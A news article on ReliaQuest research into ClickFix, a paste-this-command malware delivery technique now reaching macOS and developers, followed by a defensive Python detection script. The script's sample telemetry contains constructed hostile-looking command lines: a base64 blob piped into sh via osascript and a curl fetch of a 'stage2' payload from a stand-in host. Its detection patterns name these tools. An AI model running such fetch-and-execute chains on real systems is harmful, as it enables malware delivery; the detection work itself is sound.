ClickFix Technique Dominates Malware Delivery, Expands to macOS
A social engineering tactic known as ClickFix has become the leading method for malware delivery, with researchers noting its expansion to macOS and targeting of developers.

In a significant shift in threat actor tactics, the social engineering technique dubbed "ClickFix" has rapidly ascended to become the dominant method for malware delivery, according to new research from ReliaQuest. What was once an emerging tactic observed in 2024 has, in just two years, become the overwhelming favorite among cybercriminals for gaining initial access and evading defenses. ClickFix primarily works by tricking targeted individuals into copying and pasting malicious commands directly into system dialogs, such as Windows Terminal or macOS's Script Editor.
Attackers employ deceptive tactics, presenting users with fake error messages or verification prompts like CAPTCHAs. These prompts contain text-based commands that, when executed by the user, initiate the malicious payload. This method is particularly effective as it bypasses many traditional security measures, including file scanning and standard email-based defenses. ReliaQuest's analysis, covering activity from March 1 to May 31, found ClickFix prevalent in both initial access and defense-evasion categories.
The technique's reach has also expanded beyond Windows. Researchers observed ClickFix activity on macOS systems for the first time, with a notable example involving the Atomic macOS Stealer (AMOS). Threat actors have adapted their approach, moving from fake software lures to using applescript:// links that automatically open macOS's built-in Script Editor to run malicious commands. This change is designed to circumvent new warnings Apple introduced in macOS 26.4 that appear when users paste commands directly into the Terminal, a warning not triggered by Script Editor.
This expansion necessitates that security teams treat macOS with the same level of vigilance as Windows. "ClickFix can no longer be handled as a special case," stated Raigridas Bartkus, cybersecurity specialist at ReliaQuest. "Training, detection, and triage for it should run continuously on both Windows and macOS." Organizations must ensure their monitoring and response capabilities cover both operating systems comprehensively.
ReliaQuest's report also highlighted ClickFix's role in defense evasion, accounting for nearly 28% of such activity during the analyzed period. This was achieved through sophisticated command and file obfuscation techniques, including the use of AI-generated obfuscation to hide malware logic under thousands of variable assignments. One specific ClickFix loader observed was designed to deliver "Deepload" malware, with its obfuscation making it difficult for defenders to develop signatures quickly.
A concerning trend identified is the targeting of developers. Malvertising campaigns, particularly those appearing as sponsored search results on Google Ads for tools like "claude code install" and "homebrew install," have been used to lure developers. These fake installation pages present error messages that instruct users to copy and paste malicious commands. In compromised instances, exposed npm and Bitbucket tokens were found on affected hosts, indicating that these attacks are successfully reaching their intended, high-risk targets.
Furthermore, ClickFix is evolving from a simple delivery mechanism into a launchpad for more complex post-exploitation activities. ReliaQuest observed instances where a single pasted command was used for domain enumeration and to establish persistent access without dropping any malware. To combat this evolving threat, ReliaQuest recommends user training on both platforms to avoid pasting commands into sensitive tools, and for organizations to consider restricting access to tools like Terminal and Script Editor for average users, while implementing robust logging and alerting for developer environments.
Defensive strategies should focus on user education and technical controls. Training employees to recognize and avoid executing commands from untrusted sources is paramount. For technical staff, blocking these essential workflow tools is often impractical; therefore, robust monitoring for anomalous sequences of activity, such as base64 decoding, curl retrievals, and PowerShell or osascript executions, becomes a critical detection mechanism.
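As an added example (not code from the article or from ReliaQuest), this is the kind of sequence detection the last paragraph describes, run over constructed process telemetry: it groups indicator hits per host, flags a host where base64 decoding, a curl retrieval and an osascript or PowerShell execution fall within a short window, and records whether the chain was launched from a paste target such as Terminal or Script Editor. The host names, timestamps, indicator regexes and parent-process list are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicator classes that, seen together on one host in a short window, match the
# ClickFix pattern: decode an embedded blob, fetch a stage, run it via an interpreter.
INDICATORS = {
    "decode": re.compile(r"\bbase64\b.*(-d|--decode)|FromBase64String", re.I),
    "fetch": re.compile(r"\b(curl|Invoke-WebRequest)\b", re.I),
    "interp": re.compile(r"\b(osascript|powershell(\.exe)?)\b", re.I),
}
# Parents a pasted command is typically executed from (assumed names).
PASTE_PARENTS = {"Terminal", "Script Editor", "WindowsTerminal.exe", "cmd.exe"}

def classify(cmdline):
    """Return the set of indicator classes matched by one command line."""
    return {name for name, rx in INDICATORS.items() if rx.search(cmdline)}

def detect_clickfix(events, window=timedelta(minutes=2), min_classes=2):
    """events: dicts with ts (ISO 8601), host, parent, cmdline. Returns one alert per
    host where >= min_classes distinct indicator classes occur within `window`."""
    by_host = defaultdict(list)
    for e in events:
        classes = classify(e["cmdline"])
        if classes:
            by_host[e["host"]].append((datetime.fromisoformat(e["ts"]), e["parent"], classes))
    alerts = []
    for host, evs in by_host.items():
        evs.sort(key=lambda x: x[0])
        for i, (t0, _, _) in enumerate(evs):
            seen, parents = set(), set()
            for t, parent, classes in evs[i:]:
                if t - t0 > window:
                    break
                seen |= classes
                parents.add(parent)
            if len(seen) >= min_classes:
                alerts.append({"host": host, "start": t0.isoformat(), "classes": sorted(seen),
                               "from_paste_target": bool(parents & PASTE_PARENTS)})
                break  # one alert per host is enough for triage
    return alerts

SAMPLE_EVENTS = [  # constructed sample telemetry, not taken from the report
    {"ts": "2025-05-02T10:00:01", "host": "mac-dev-07", "parent": "Script Editor",
     "cmdline": "osascript -e 'do shell script \"echo aGVsbG8= | base64 -d | sh\"'"},
    {"ts": "2025-05-02T10:00:03", "host": "mac-dev-07", "parent": "sh",
     "cmdline": "curl -fsSL http://example.invalid/stage2 -o /tmp/.s"},
    {"ts": "2025-05-02T11:30:00", "host": "build-12", "parent": "bash",
     "cmdline": "curl -fsSL https://example.invalid/ci-artifact.tgz -o a.tgz"},
]

if __name__ == "__main__":
    for a in detect_clickfix(SAMPLE_EVENTS):
        print(a)
```

The second host only fetches with curl, so a lone indicator does not alert; the tuning knobs are the window and the number of distinct classes required, which trade false positives on developer hosts against detection of slower chains.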